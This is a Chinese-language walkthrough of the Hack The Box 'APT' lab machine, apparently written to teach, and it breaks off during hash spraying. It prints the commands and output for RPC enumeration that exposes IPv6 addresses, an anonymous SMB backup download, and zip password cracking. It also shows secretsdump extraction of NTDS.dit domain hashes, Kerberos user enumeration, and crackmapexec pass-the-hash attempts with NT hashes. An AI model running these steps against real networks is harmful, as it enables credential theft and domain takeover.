点击网站的很多功能点后,发现都是重定向到首页,说明该网站还只是处于战略部署阶段,并不完善,只是一个demo,而且看起来像是用某种cms框架搭建的,并且大部分是纯静态的,没有什么可利用的地方,除了SUPPORT
2024-03-02-15-34-21
发现该表单数据被提交到一个新的ip地址,说明内网中可能不仅仅存在一台设备:
2024-03-02-15-37-35
因此这种情况下再尝试sql注入、xss等的必要性并不大,暂时先放弃

目录爆破
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# gobuster dir -u http://10.129.96.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# gobuster dir -u http://10.129.96.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.96.60
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 150] [--> http://10.129.96.60/images/]
/Images               (Status: 301) [Size: 150] [--> http://10.129.96.60/Images/]
/css                  (Status: 301) [Size: 147] [--> http://10.129.96.60/css/]
/js                   (Status: 301) [Size: 146] [--> http://10.129.96.60/js/]
/fonts                (Status: 301) [Size: 149] [--> http://10.129.96.60/fonts/]
/IMAGES               (Status: 301) [Size: 150] [--> http://10.129.96.60/IMAGES/]
/Fonts                (Status: 301) [Size: 149] [--> http://10.129.96.60/Fonts/]
/CSS                  (Status: 301) [Size: 147] [--> http://10.129.96.60/CSS/]
/JS                   (Status: 301) [Size: 146] [--> http://10.129.96.60/JS/]
===============================================================
Finished
===============================================================

并没有扫描到什么特别的,尝试访问这些目录也没有权限

查看源码

2024-03-02-16-14-36
既然猜测可能是某个cms搭建的,源码中可能会暴露出信息,特别是注释,但是从结果来看,这并不是cms,而是从刚才的另一个ip中镜像而来的网站,并且暴露了对应的工具,显然接下来可以看看该工具是否有存在什么公开漏洞

寻找公开漏洞
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# searchsploit HTTrack Website Copier
Exploits: No Results
Shellcodes: No Results                                   
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# searchsploit HTTrack Website       
Exploits: No Results
Shellcodes: No Results                          
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# searchsploit HTTrack        
Exploits: No Results
Shellcodes: No Results

搜索:
2024-03-02-16-19-18
显然该镜像工具有存在过漏洞,看看漏洞细节
但是我们了解到该工具是个二进制程序,而不是暴露在web中的程序,并且该二进制程序并没有暴露出可以让我们交互的端口,因此公开漏洞中的缓冲区溢出漏洞、dll劫持等暂时是无法利用的,因此这个攻击路径行不通,没有必要浪费时间复现

尝试查看图像是否存在隐写信息

由于常规的思路我们都尝试过,没有找到什么可利用的信息,这时可以尝试下载网站的图像,看看是否存在隐写信息

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# wget http://10.129.96.60/images/p2.jpg
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# exiftool p2.jpg        
ExifTool Version Number         : 12.76
File Name                       : p2.jpg
Directory                       : .
File Size                       : 28 kB
File Modification Date/Time     : 2019:09:06 01:58:48+08:00
File Access Date/Time           : 2024:03:02 16:31:45+08:00
File Inode Change Date/Time     : 2024:03:02 16:31:45+08:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.02
Resolution Unit                 : None
X Resolution                    : 100
Y Resolution                    : 100
Quality                         : 60%
DCT Encode Version              : 100
APP14 Flags 0                   : [14], Encoded with Blend=1 downsampling
APP14 Flags 1                   : (none)
Color Transform                 : YCbCr
Image Width                     : 370
Image Height                    : 247
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 370x247
Megapixels                      : 0.091
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# strings p2.jpg
。。。

依然没有找到有价值信息,寻找过程中发现有一张图片有点可疑:
2024-03-02-16-37-17
因为这里的文字出现在这里看着奇怪,像是某种提示,并且文件名也像是有某种特别的含义

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# wget http://10.129.96.60/images/outsource.jpg
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# exiftool outsource.jpg 
ExifTool Version Number         : 12.76
File Name                       : outsource.jpg
Directory                       : .
File Size                       : 1779 kB
File Modification Date/Time     : 2019:12:23 19:36:32+08:00
File Access Date/Time           : 2024:03:02 16:35:26+08:00
File Inode Change Date/Time     : 2024:03:02 16:35:26+08:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 300
Y Resolution                    : 300
Image Width                     : 1920
Image Height                    : 1152
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1920x1152
Megapixels                      : 2.2
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# strings outsource.jpg 
。。。

然而还是没有什么特别的,到这里暂时没有什么收获,该端口的利用暂时放弃,但是不排除后面获取更多信息后可能还需要返回到这里尝试利用

尝试连接msrpc

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcclient -U '' -N 10.129.96.60
Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT
                                      
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcclient -U '' -N -p 135 10.129.96.60
Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT

由于该工具默认是连接139,我们把两种都尝试了,都连接不了

尝试利用msrpc

对于该服务的利用,可以尝试来自于python3的impacket库的重要工具

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# export PATH=/usr/share/doc/python3-impacket/examples:$PATH
                                   
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# echo $PATH                                                
/usr/share/doc/python3-impacket/examples:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin:/root/.local/bin:/root/.local/bin

这个类库在渗透过程中对基本协议的深度扫描和利用非常重要,其中的很多工具在渗透利用中都经常出现,以下是官方对它的介绍:
2024-03-02-16-57-12还有:https://www.coresecurity.com/core-labs/open-source-tools/impacket
注意这里的low-level的理解是指代底层级别的,它非常重要而不是水平很低,从底层级别对这些协议的数据包进行访问,开始利用:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcdump.py 10.129.96.60
。。。

rpcdump.py: This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well known endpoints.
rpcdump.py:此脚本将转储在目标上注册的 RPC 端点和字符串绑定的列表。它还会尝试将它们与众所周知的端点列表进行匹配。

这个工具仅仅是把rpc协议下在135端口下跑的DCOM组件和方法等列出来,但是我们并不知道它们具体都是做什么的,这时候需要用到rpcmap,这个工具相比于rpcdump更精细,它会映射出DCOM的具体内容并对它进行深度的枚举

rpcmap.py: Scan for listening DCE/RPC interfaces. This binds to the MGMT interface and gets a list of interface UUIDs. If the MGMT interface is not available, it takes a list of interface UUIDs seen in the wild and tries to bind to each interface.
rpcmap.py:扫描侦听 DCE/RPC 接口。这会绑定到 MGMT 接口并获取接口 UUID 列表。如果 MGMT 接口不可用,它将获取在野外看到的接口 UUID 列表,并尝试绑定到每个接口。

DCOM(分布式组件对象模型)是一组 Microsoft 概念和程序接口,其中客户端程序对象可以向网络中其他计算机上的服务器程序对象请求服务。

爆破接口uuid和操作数

这对于我们来说很陌生,但这很正常,渗透过程中经常会遇到陌生的技术,我们现在只想知道这里结果中的uuid是什么,背后是对应在运行着什么服务/接口,这里可以通过rpcmap尝试爆破:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# rpcmap.py ncacn_ip_tcp:10.129.96.60[135] -brute-uuids -brute-opnums
。。。
Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0
Opnum 0: rpc_x_bad_stub_data               
Opnum 1: rpc_x_bad_stub_data               
Opnum 2: rpc_x_bad_stub_data               
Opnum 3: success                           
Opnum 4: rpc_x_bad_stub_data               
Opnum 5: success                           
Opnums 6-64: nca_s_op_rng_error (opnum not found)

Protocol: [MS-RPCE]: Remote Management Interface
Provider: rpcrt4.dll                       
UUID: AFA8BD80-7D8A-11C9-BEF4-08002B102989 v1.0
Opnum 0: success
Opnum 1: rpc_x_bad_stub_data
Opnum 2: success
Opnum 3: success
Opnum 4: rpc_x_bad_stub_data
Opnums 5-64: nca_s_op_rng_error (opnum not found)
。。。

除了上述列出的,其他都是rpc_s_access_denied或者爆破不成功,没意义
尝试搜索这两个uuid:
2024-03-07-14-54-44
这已经显示了对应的接口名,看看该接口的细节,这里还给了对应的调用方法:
2024-03-07-15-11-26

寻找利用途径

仔细观察这些方法有自己的操作数,这正好对应我们上面爆破的结果,因此我们应该重点关注第三和第五个方法的利用,其中第五个是另一个的扩展。但这些信息是来自于微软官方文档,不可能提供利用信息,我们应该进一步搜索:
2024-03-07-15-55-33
确实有人和我们一样想尝试调用这个方法,并且给出了解决工具:
2024-03-07-15-56-40
2024-03-07-15-57-23
再进一步搜索:
2024-03-07-15-50-52
其中我们在下面的文章中发现利用该解析器的细节:

The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication


https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/

This article series will be composed of two parts:
本系列文章将由两部分组成:
The first part will explain how to to achieve a remote enumeration of network interfaces on a Windows OS machine without any authentication. We will show that this is done from a RPC method which is held by the IOXIDResolver interface. This interface is part of the DCOM remote object activation. A python script and the methodology to implement such a tool in native code will be delivered.
第一部分将解释如何在 Windows 操作系统计算机上实现网络接口的远程枚举,而无需任何身份验证。我们将展示这是通过 IOXIDResolver 接口持有的 RPC 方法完成的。该接口是 DCOM 远程对象激活的一部分。将提供 python 脚本以及以本机代码实现此类工具的方法。
The second part will explain why such RPC is used inside a DCOM environment. This involves diving into the OXID Resolver component. The latter requires to understand some DCOM concepts such as transparency, marshalling and object reference. This part will be described in the next blog post.
第二部分将解释为什么在 DCOM 环境中使用这种 RPC。这涉及深入研究 OXID Resolver 组件。后者需要理解一些 DCOM 概念,例如透明度、编组和对象引用。这部分将在下一篇博客文章中描述。
2024-03-07-16-01-04

解析出隐藏的ipv6地址

大致浏览文章,和我们遇到的情况很相似,这里用到的工具来自于https://github.com/mubix/IOXIDResolver ,尝试利用:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# python3 IOXIDResolver.py -h
IOXIDResolver.py -t <target>
                         
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# python3 IOXIDResolver.py -t 10.129.96.60
[*] Retrieving network interface of 10.129.96.60
Address: apt
Address: 10.129.96.60
Address: dead:beef::10b
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::f9e3:e61a:564f:3e8a

信息搜集

观察结果,我们发现该解析器将目标ip的ipv6地址给解析出来了!这是一个重要的信息,接下来就需要验证这些ipv6地址的有效性,先将这些地址保存。我们依然可以通过nmap对这些新地址进行扫描,与常规扫描端口思路一样:

ipv6 tcp全端口扫描
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f -oA nmapscan/6tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:17 CST
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.38s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49675/tcp open  unknown
49698/tcp open  unknown
54047/tcp open  unknown

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# tcports6=$(grep open nmapscan/6tcports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
echo $tcports6
53,80,88,135,389,445,464,593,636,3268,5985,9389,47001,49665,49666,49667,49669,49670,49698,54047
ipv6 tcp详细扫描
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]                                                                                                                          
└─# nmap -6 -sT -sC -sV -O -p53,80,88,135,389,445,464,593,636,3268,5985,9389,47001,49665,49666,49667,49669,49670,49698,54047 dead:beef::b885:d62a:d679:573f -oA nmapscan/6tc
pdetails                                                                                                                                                                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:27 CST                                                                                                          
sendto in send_ipv6_ipproto_raw: sendto(10, packet, 80, 0, dead:beef::b885:d62a:d679:573f, 28) => Operation not permitted                                                   
Offending packet: ICMPv6 (58) dead:beef:2::100d > dead:beef::b885:d62a:d679:573f (type=128/code=0) hopl=55 flow=12345 payloadlen=40                                         
Unable to send packet in probe_transmission_handler: Operation not permitted (1)                                                                                            
Nmap scan report for dead:beef::b885:d62a:d679:573f                                                                                                                         
Host is up (0.20s latency).                                                                                
PORT      STATE SERVICE      VERSION                                                                                                                                        
53/tcp    open  domain       Simple DNS Plus                                                                                                                                
80/tcp    open  http         Microsoft IIS httpd 10.0                                                                                                                       
|_http-title: Bad Request                                                                                                                                                   
| http-server-header:                                                                                                                                                       
|   Microsoft-HTTPAPI/2.0                                                                                                                                                   
|_  Microsoft-IIS/10.0                                                                                                                                                      
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-07 08:27:29Z)                                                                                 
135/tcp   open  msrpc        Microsoft Windows RPC                                                                                                                          
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)                                                     
| ssl-cert: Subject: commonName=apt.htb.local                                                                                                                               
| Subject Alternative Name: DNS:apt.htb.local                                                                                                                               
| Not valid before: 2020-09-24T07:07:18                                                                                                                                     
|_Not valid after:  2050-09-24T07:17:18                                                                                                                                     
|_ssl-date: 2024-03-07T08:28:41+00:00; -27s from scanner time.                                                                                                              
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)                                                                               
464/tcp   open  kpasswd5?                                                                                                                                                   
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0                                                                                                            
636/tcp   open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)                                                     
| ssl-cert: Subject: commonName=apt.htb.local                                                                                                                               
| Subject Alternative Name: DNS:apt.htb.local                                                                                                                               
| Not valid before: 2020-09-24T07:07:18                                                                                                                                     
|_Not valid after:  2050-09-24T07:17:18                                                                                                                                     
|_ssl-date: 2024-03-07T08:28:40+00:00; -28s from scanner time.                                 
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2024-03-07T08:28:41+00:00; -27s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0 
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0 
|_http-title: Bad Request
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        Microsoft Windows RPC
49698/tcp open  msrpc        Microsoft Windows RPC
54047/tcp open  msrpc        Microsoft Windows RPC
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows Vista|7|2008 R2|2012 R2 (96%)
OS CPE: cpe:/o:microsoft:windows_vista::sp2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_server_20
12:r2
OS fingerprint not ideal because: Some probes failed to send so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -27s, deviation: 1s, median: -27s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2024-03-07T08:28:26
|_  start_date: 2024-03-07T05:58:50
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: apt
|   NetBIOS computer name: APT\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: apt.htb.local
|_  System time: 2024-03-07T08:28:27+00:00
ipv6 udp端口扫描
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 -sU --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f -oA nmapscan/6udports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:23 CST
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.18s latency).
All 65535 scanned ports on dead:beef::b885:d62a:d679:573f are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
ipv6 脚本漏扫
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 --script=vuln -p53,80,88,135,389,445,464,593,636,3268,5985,9389,47001,49665,49666,49667,49669,49670,49698,54047 dead:beef::b885:d62a:d679:573f -oA nmapscan/6vul
n
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:35 CST
Stats: 0:03:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 16:38 (0:00:00 remaining)
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.24s latency).

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49698/tcp open  unknown
54047/tcp open  unknown

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
扫描结果分析

观察结果,很明显这些是域名控制器的典型端口特征,将扫描到的域名添加到host文件中,80、135、445、593这些端口优先尝试利用,访问ipv6对应的web服务,发现和ipv4时一样,因此不考虑

尝试获取ipv6 smb共享

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# smbclient -L //htb.local
Password for [WORKGROUP\root]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        backup          Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
htb.local is an IPv6 address -- no workgroup available
# Obviously, what is most interested in us is backup
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# smbclient  //htb.local/backup
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Sep 24 15:30:52 2020
  ..                                  D        0  Thu Sep 24 15:30:52 2020
  backup.zip                          A 10650961  Thu Sep 24 15:30:32 2020

                5114623 blocks of size 4096. 2634678 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (577.5 KiloBytes/sec) (average 577.5 KiloBytes/sec)
# try others:
┌──(root㉿hunter)-[/home/…/htb/APT/backup/registry]
└─# smbclient  //htb.local/IPC$
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
                                      
┌──(root㉿hunter)-[/home/…/htb/APT/backup/registry]
└─# smbclient  //htb.local/NETLOGON
Password for [WORKGROUP\root]:
Anonymous login successful
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED

smb: \> exit
┌──(root㉿hunter)-[/home/…/htb/APT/backup/registry]
└─# smbclient  //htb.local/SYSVOL                                                                            
Password for [WORKGROUP\root]:
Anonymous login successful

tree connect failed: NT_STATUS_CONNECTION_RESET
# Obviously, there are very large value files, but unfortunately, they have been encrypted, and they come from a backup file, so maybe they are not latest.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# unzip -l backup.zip                   
Archive:  backup.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2020-09-23 19:40   Active Directory/
 50331648  2020-09-23 19:38   Active Directory/ntds.dit
    16384  2020-09-23 19:38   Active Directory/ntds.jfm
        0  2020-09-23 19:40   registry/
   262144  2020-09-23 19:22   registry/SECURITY
 12582912  2020-09-23 19:22   registry/SYSTEM
---------                     -------
 63193088                     6 files
# Obviously,they are safe, we dont need to continue to analyze deeply.  
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# unzip -d backup backup.zip
Archive:  backup.zip
   creating: backup/Active Directory/
[backup.zip] Active Directory/ntds.dit password: 
   skipping: Active Directory/ntds.dit  incorrect password
   skipping: Active Directory/ntds.jfm  incorrect password
   creating: backup/registry/
   skipping: registry/SECURITY       incorrect password
   skipping: registry/SYSTEM         incorrect password

尝试破解zip

John the Ripper 要求密码哈希采用特定格式。首先要将 ZIP 文件的密码哈希转换为适当的格式,使用 John the Ripper 附带的 zip2john 实用程序

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# zip2john backup.zip > zip.hash
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB ts=9CCA cs=acd0 type=8
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785 ts=9CCA cs=2a39 type=8
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3 ts=9AC6 cs=9beb type=8
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD ts=9AC6 cs=65d9 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash  
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch   (backup.zip)     
1g 0:00:00:00 DONE (2024-03-09 10:30) 20.00g/s 819200p/s 819200c/s 819200C/s 123456..loserface1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# unzip -d backup backup.zip
Archive:  backup.zip
   creating: backup/Active Directory/
[backup.zip] Active Directory/ntds.dit password: 
  inflating: backup/Active Directory/ntds.dit  
  inflating: backup/Active Directory/ntds.jfm  
   creating: backup/registry/
  inflating: backup/registry/SECURITY  
  inflating: backup/registry/SYSTEM  

很快,我们破解成功了

关于ntds.dit:
NTDS.DIT​​ 在 Active Directory 中至关重要。它充当所有域对象及其相关信息的集中存储库。对域所做的任何更改(例如创建新用户帐户、修改组成员身份或更新用户属性)都会反映在 NTDS.DIT​​ 文件中。该文件充当整个域的单一事实来源,从而实现高效的管理和身份验证过程。简单来说,只要成功读取并解析该文件的内容,我们可以获取到域内的hash信息,当破解成功hash,这就相当于获取了整个域的控制权,并且重要的是,这些密码的提取和破解可以离线执行,因此它们将无法被检测到,一旦攻击者提取了这些哈希值,他们就可以充当域中的任何用户。

secretsdump读取ntds.dit

secretsdump同样来自于优秀的impacket库,用来读取ntds.dit非常合适

┌──(root㉿hunter)-[/home/…/htb/APT/backup/Active Directory]
└─# export PATH=/usr/share/doc/python3-impacket/examples:$PATH
                
┌──(root㉿hunter)-[/home/…/htb/APT/backup/Active Directory]
└─# secretsdump.py -ntds ./ntds.dit -system ../registry/SYSTEM LOCAL > ../../user_hash_raw
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# cat user_hash_raw| wc -l
8005
# so much data!So we need to extract the hash with the account password, and then try to collide,that is, it ends with ":::".
# At this stage, if this is in a real offensive and defensive environment, we can first directly try to use the hash of administrator to transmit and connect to winrm. There is a probability of success, but this is a target plane, so it can not be so easy.

开始处理数据:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# cat user_hash_raw| grep ':::' | awk -F':' '{print $1}' | sort -u > user_list
                                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# cat user_hash_raw| grep ':::' | awk -F':' '{print $3,$4}' | sed 's/ /:/g' > user_list 

利用pre-authentication机制验证用户和hash有效性

从上面我们知道获取到的hash和用户分别都是2000行数据,如果我们要直接用hash碰撞,这样的数据量组合非常大,很影响效率,因此在这之前,我们必须先筛选出有效的用户,减少不必要的工作量。我们可以利用DC的pre-authentication机制,通过返回信息的不同来识别出哪些用户是有效的,工具kerbrute可以帮助我们实现

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# kerbrute userenum -d htb.local --dc htb.local ./user_list        

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 03/09/24 - Ronnie Flathers @ropnop

2024/03/09 11:49:52 >  Using KDC(s):
2024/03/09 11:49:52 >   htb.local:88

2024/03/09 11:50:03 >  [+] VALID USERNAME:       Administrator@htb.local
2024/03/09 11:51:09 >  [+] VALID USERNAME:       APT$@htb.local
2024/03/09 11:57:38 >  [+] VALID USERNAME:       henry.vinson@htb.local
2024/03/09 12:08:08 >  Done! Tested 2000 usernames (3 valid) in 1096.093 seconds

事实上,不仅仅只有这种方式,我们还可以利用nmap的脚本:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='htb.local',userdb=user_list htb.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-09 11:53 CST
Stats: 0:01:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 43.78% done; ETC: 11:56 (0:01:40 remaining)
Nmap scan report for htb.local (dead:beef::b885:d62a:d679:573f)
Host is up (0.21s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users: 
| Discovered Kerberos principals
|     Administrator@htb.local
|     henry.vinson@htb.local
|_    APT$@htb.local

Nmap done: 1 IP address (1 host up) scanned in 173.48 seconds

其中, APT$这个用户的命名结构很特别,显然是个隐藏用户,一般隐藏用户用于某些系统级别的功能,所以它也具有一定的利用价值。筛选出了有效用户,显然下一步应该是尝试hash碰撞,用2000个hash碰撞这三个有效用户,如果有碰撞成功的一对组合,我们就可以获取到了立足点。

尝试hash碰撞

crackmapexec工具也可以用于hash碰撞,需要指定利用的协议,由信息搜集的结果来看,我们只能通过这三个协议:
2024-03-12-14-40-47优先选择smb

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# crackmapexec smb htb.local -u usr_effective -H hash_list 
SMB         htb.local       445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE 
SMB         htb.local       445    APT              [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE 
